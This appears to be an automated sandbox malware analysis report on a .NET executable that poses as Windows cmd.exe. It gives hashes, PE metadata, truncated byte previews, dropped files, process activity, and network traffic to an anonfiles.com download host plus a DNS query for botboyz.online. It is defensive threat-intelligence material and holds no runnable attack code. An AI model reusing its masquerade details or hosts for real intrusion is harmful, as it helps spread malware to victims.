SHA1:	A1AFFC24ECCD62C47EC66FD463C423DEC580FF95
SHA-256:	D990DF5972320FDD3546F7BDDE414707F3BFA1B76B8308F11362B18B9521E5D2
SHA-512:	DFCB60FD349191BBB074A1748AF8CA4C615A1D2A8420BE0E666E5A0A75C4A2027D1A0C95DB8446CF6E07370848EF14248D4C3F6086E85C99F9AAF46586EAF0CD
Malicious:	false
Preview:	<!DOCTYPE HTML>.<html lang="en_US">..<head>.. <meta charset="UTF-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">.. <meta name="robots" content="index, follow">. <title>cmd.exe - AnonFiles</title>. . <link href="//vjs.zencdn.net/7.3.0/video-js.min.css" rel="stylesheet">. . <link rel="stylesheet" href="/css/anonfiles.css?1621545025"/>. [if lt IE 9]>. <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>. <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>. <![endif]-->. <script type="text/javascript">. var cfg = {"authenticated":false,"upload_api_endpoint":"https:\/\/api.anonfiles.com\/upload","hua":false,"as":"11","domain":"anonfiles.com","pde":false};. </script>.. <script src="/js/app.js?1621545025"></script>.. <link rel="shortcut icon" href=

C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe Download File
Process:	C:\Users\user\Desktop\wa71myDkbQ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	367616
Entropy (8bit):	7.81030084124566
Encrypted:	false
SSDEEP:	6144:vNLee8O0/j2dbtMq09oPpBH6lge2EYc+6KKFodcrud6S06m0tYhH9/RlGu2M:lijfj21tJ09ypBYYc+X8YIYJRm0a9plg
MD5:	C4050E6BDD335E319CA7B848D53B9108
SHA1:	5FE92C2D7DC68A5FFE2F40270BB994D8EA4E62EF
SHA-256:	5DB793F73ECFFD1D88DA746F8CE03D798B65B9AB2BC13DF307F25DE29BE546DC
SHA-512:	2DD2F1CD08F988DE1F58D932E97AED19E82BA9D313F6594BD6026C6C0ED23F823627F4A8D98C89ED15BFFB6F9B5AD98F4E488D70C9CB79397C663C2A53C0EBF2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`............................ 5... ...@....@.. ....................................@..................................4..J....@.............................................................................. ............... ..H............text...&.... ...................... ..`.rsrc.......@......................@..@.reloc..............................@..B.................5......H........%...............9..............................................2+.+.X.+..+.....0..v........,W+Wr...p8W...8\...+.+.+.+.+.+$o....(......-s....+..+..+..+.o....+..+..-..-..,..,..o......(....8....o....8.....8..............3G.......0...........,[+t8y...8z...8{...8......9....&+K8}...8~....8~.....o....,+..o....%o....."...........io....&.,..,.....-..X...,...i2..(....8.....8.....8....o....8{....8z....8\|....8}....8\|....8\|.....r;..p+..#...+..#...+.+.X.#...+.*.+..+..+..+.( .

C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\wa71myDkbQ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\17134.1.x86fre.rs4_release.180410-1804_x86Maria.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	161
Entropy (8bit):	5.339130600372329
Encrypted:	false
SSDEEP:	3:LuUHQTT/zB2ULSL/0uzDhgPGjrwB2ULSL/0uzDhgPZqxxVJZLzCmprwYcZX3jH+J:doT/V2wuBgPGE2wuBgPUxtZyer0X37+J
MD5:	CE6B15C31EA79705DF07E953572F070E
SHA1:	58BE9549947DE9120740B0190C0DC11643BBAC1E
SHA-256:	AEAC01E379A8F63C21A0343030B9CA277D35DCCE25F49D525C1ACC35FBB622DA
SHA-512:	E80C14F9FBFF800266185D811856747FCDC10005AEC8CF0D64F7A83D4E48DFBC99C28CC77C8D0D7D460C572D0BFE40D7824562C71BD00E70192E6C179FD44DDB
Malicious:	false
Preview:	D;]QsphsbnEbub]\|N166ZVOC.GES1.G:T2.JBQ3.J7ZWIGDLQW[N~]BJLZ/fyf<\|N166ZVOC.GES1.G:T2.JBQ3.J7ZWIGDLQW[N~<\|BFMTT4VI.WS8W.OCTZ.6P5Y.R9RTCLNU[BB3~<2/6/21/bwfnbsjb.sd26

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.81030084124566
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	wa71myDkbQ.exe
File size:	367616
MD5:	c4050e6bdd335e319ca7b848d53b9108
SHA1:	5fe92c2d7dc68a5ffe2f40270bb994d8ea4e62ef
SHA256:	5db793f73ecffd1d88da746f8ce03d798b65b9ab2bc13df307f25de29be546dc
SHA512:	2dd2f1cd08f988de1f58d932e97aed19e82ba9d313f6594bd6026c6c0ed23f823627f4a8d98c89ed15bffb6f9b5ad98f4e488d70c9cb79397c663c2a53c0ebf2
SSDEEP:	6144:vNLee8O0/j2dbtMq09oPpBH6lge2EYc+6KKFodcrud6S06m0tYhH9/RlGu2M:lijfj21tJ09ypBYYc+X8YIYJRm0a9plg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`............................ 5... ...@....@.. ....................................@................................

File Icon


Icon Hash:	b0ef7ac32101a5a0

Static PE Info

General
Entrypoint:	0x453520
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60A705C3 [Fri May 21 00:58:43 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x534d6	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x81dc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x51526	0x51600	False	0.982976910522	data	7.97827375309	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x54000	0x81dc	0x8200	False	0.280588942308	data	4.31650818288	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5e000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x540b4	0x668	data
RT_ICON	0x54740	0x2e8	data
RT_ICON	0x54a4c	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x54b98	0xea8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x55a64	0x8a8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x56330	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x568bc	0x169e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x57f7e	0x25a8	dBase III DBT, version number 0, next free block index 40
RT_ICON	0x5a54a	0x10a8	data
RT_ICON	0x5b616	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x5baba	0x92	data
RT_VERSION	0x5bb88	0x42e	data
RT_MANIFEST	0x5bff2	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Microsoft Corporation. All rights reserved.
Assembly Version	10.0.21376.1
InternalName	ConsoleApp4.exe
FileVersion	10.0.21376.1
CompanyName	Microsoft Corporation
LegalTrademarks
Comments	Windows Command Processor
ProductName	Microsoft Windows Operating System
ProductVersion	10.0.21376.1
FileDescription	Windows Command Processor
OriginalFilename	ConsoleApp4.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 21:20:12.129040003 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.200845957 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.201792002 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.269000053 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.333229065 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.333566904 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.333636045 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.333656073 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.333667994 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.333738089 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.333776951 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.342032909 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.342477083 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.470135927 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.536781073 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.538677931 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.538789988 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.571316957 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.635560989 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.635910988 CEST	443	49727	217.64.149.169	192.168.2.7
Jun 10, 2021 21:20:12.635988951 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:12.722193956 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:12.764545918 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:12.764652014 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:12.765836954 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:12.808046103 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:12.812210083 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:12.812247038 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:12.812355995 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:12.849792957 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:12.894202948 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:12.894411087 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:12.894511938 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:12.898741961 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:12.945228100 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:13.085769892 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:13.085818052 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:13.085860968 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:13.085885048 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:13.085889101 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:13.085922003 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:13.085926056 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:13.085947990 CEST	443	49728	104.21.10.26	192.168.2.7
Jun 10, 2021 21:20:13.085973024 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:13.086052895 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:13.086060047 CEST	49728	443	192.168.2.7	104.21.10.26
Jun 10, 2021 21:20:19.773669004 CEST	49727	443	192.168.2.7	217.64.149.169
Jun 10, 2021 21:20:19.773713112 CEST	49728	443	192.168.2.7	104.21.10.26

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 21:19:07.276602030 CEST	51837	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:07.327945948 CEST	53	51837	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:08.759785891 CEST	55411	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:08.812582970 CEST	53	55411	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:09.012341976 CEST	63668	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:09.090264082 CEST	53	63668	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:09.679524899 CEST	54640	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:09.730076075 CEST	53	54640	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:10.846373081 CEST	58739	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:10.899271011 CEST	53	58739	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:11.967596054 CEST	60338	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:12.017846107 CEST	53	60338	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:12.894280910 CEST	58717	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:12.946121931 CEST	53	58717	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:13.764880896 CEST	59762	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:13.815186024 CEST	53	59762	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:14.576077938 CEST	54329	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:14.627500057 CEST	53	54329	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:15.406795025 CEST	58052	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:15.466742039 CEST	53	58052	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:16.281419039 CEST	54008	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:16.343240023 CEST	53	54008	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:17.132688046 CEST	59451	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:17.194674015 CEST	53	59451	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:17.941169977 CEST	52914	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:18.000180960 CEST	53	52914	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:18.963100910 CEST	64569	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:19.015882969 CEST	53	64569	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:19.800062895 CEST	52816	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:19.853306055 CEST	53	52816	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:20.613143921 CEST	50781	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:20.663712025 CEST	53	50781	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:21.477369070 CEST	54230	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:21.529341936 CEST	53	54230	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:22.381133080 CEST	54911	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:22.432414055 CEST	53	54911	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:23.188146114 CEST	49958	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:23.241686106 CEST	53	49958	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:24.017945051 CEST	50860	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:24.069262981 CEST	53	50860	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:24.875157118 CEST	50452	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:24.934343100 CEST	53	50452	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:25.704467058 CEST	59730	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:25.754652977 CEST	53	59730	8.8.8.8	192.168.2.7
Jun 10, 2021 21:19:32.434860945 CEST	59310	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:19:32.499866009 CEST	53	59310	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:03.900307894 CEST	51919	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:03.953713894 CEST	53	51919	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:04.392226934 CEST	64296	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:04.443552971 CEST	53	64296	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:05.338016987 CEST	56680	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:05.390856981 CEST	53	56680	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:12.003587008 CEST	58820	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:12.075884104 CEST	53	58820	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:12.657691002 CEST	60983	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:12.719708920 CEST	53	60983	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:17.086601019 CEST	49247	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:17.157699108 CEST	53	49247	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:28.995131016 CEST	52286	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:29.066765070 CEST	53	52286	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:40.642894983 CEST	56064	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:40.708602905 CEST	53	56064	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:41.914885998 CEST	63744	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:41.975600004 CEST	53	63744	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:55.488524914 CEST	61457	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:55.549401045 CEST	53	61457	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:57.608964920 CEST	58367	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:57.660366058 CEST	53	58367	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:59.005496025 CEST	60599	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:59.064006090 CEST	53	60599	8.8.8.8	192.168.2.7
Jun 10, 2021 21:20:59.660485983 CEST	59571	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:20:59.710860014 CEST	53	59571	8.8.8.8	192.168.2.7
Jun 10, 2021 21:21:00.240583897 CEST	52689	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:21:00.275490046 CEST	50290	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:21:00.291194916 CEST	53	52689	8.8.8.8	192.168.2.7
Jun 10, 2021 21:21:00.334312916 CEST	53	50290	8.8.8.8	192.168.2.7
Jun 10, 2021 21:21:00.934710979 CEST	60427	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:21:00.984982967 CEST	53	60427	8.8.8.8	192.168.2.7
Jun 10, 2021 21:21:01.547835112 CEST	56209	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:21:01.692864895 CEST	53	56209	8.8.8.8	192.168.2.7
Jun 10, 2021 21:21:02.509653091 CEST	59582	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:21:02.570660114 CEST	53	59582	8.8.8.8	192.168.2.7
Jun 10, 2021 21:21:03.729865074 CEST	60949	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:21:03.791855097 CEST	53	60949	8.8.8.8	192.168.2.7
Jun 10, 2021 21:21:04.720763922 CEST	58542	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:21:04.779510021 CEST	53	58542	8.8.8.8	192.168.2.7
Jun 10, 2021 21:21:05.240956068 CEST	59179	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:21:05.291420937 CEST	53	59179	8.8.8.8	192.168.2.7
Jun 10, 2021 21:21:48.727531910 CEST	60927	53	192.168.2.7	8.8.8.8
Jun 10, 2021 21:21:48.794642925 CEST	53	60927	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 10, 2021 21:20:12.003587008 CEST	192.168.2.7	8.8.8.8	0xe119	Standard query (0)	cdn-101.anonfiles.com	A (IP address)	IN (0x0001)
Jun 10, 2021 21:20:12.657691002 CEST	192.168.2.7	8.8.8.8	0xe7c5	Standard query (0)	anonfiles.com	A (IP address)	IN (0x0001)
Jun 10, 2021 21:20:40.642894983 CEST	192.168.2.7	8.8.8.8	0x1083	Standard query (0)	botboyz.online	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 10, 2021 21:20:12.075884104 CEST	8.8.8.8	192.168.2.7	0xe119	No error (0)	cdn-101.anonfiles.com		217.64.149.169	A (IP address)	IN (0x0001)
Jun 10, 2021 21:20:12.719708920 CEST	8.8.8.8	192.168.2.7	0xe7c5	No error (0)	anonfiles.com		104.21.10.26	A (IP address)	IN (0x0001)
Jun 10, 2021 21:20:12.719708920 CEST	8.8.8.8	192.168.2.7	0xe7c5	No error (0)	anonfiles.com		172.67.189.219	A (IP address)	IN (0x0001)
Jun 10, 2021 21:20:40.708602905 CEST	8.8.8.8	192.168.2.7	0x1083	Name error (3)	botboyz.online	none	none	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jun 10, 2021 21:20:12.342032909 CEST	217.64.149.169	443	192.168.2.7	49727	CN=cdn-101.anonfiles.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon May 31 01:36:58 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Sun Aug 29 01:36:58 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024
Jun 10, 2021 21:20:12.812247038 CEST	104.21.10.26	443	192.168.2.7	49728	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed May 05 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Thu May 05 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jun 10, 2021 21:20:12.812247038 CEST	104.21.10.26	443	192.168.2.7	49728	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wa71myDkbQ.exe PID: 3192 Parent PID: 5664

General

Start time:	21:19:14
Start date:	10/06/2021
Path:	C:\Users\user\Desktop\wa71myDkbQ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\wa71myDkbQ.exe'
Imagebase:	0x330000
File size:	367616 bytes
MD5 hash:	C4050E6BDD335E319CA7B848D53B9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 5588 Parent PID: 3192

General

Start time:	21:20:09
Start date:	10/06/2021
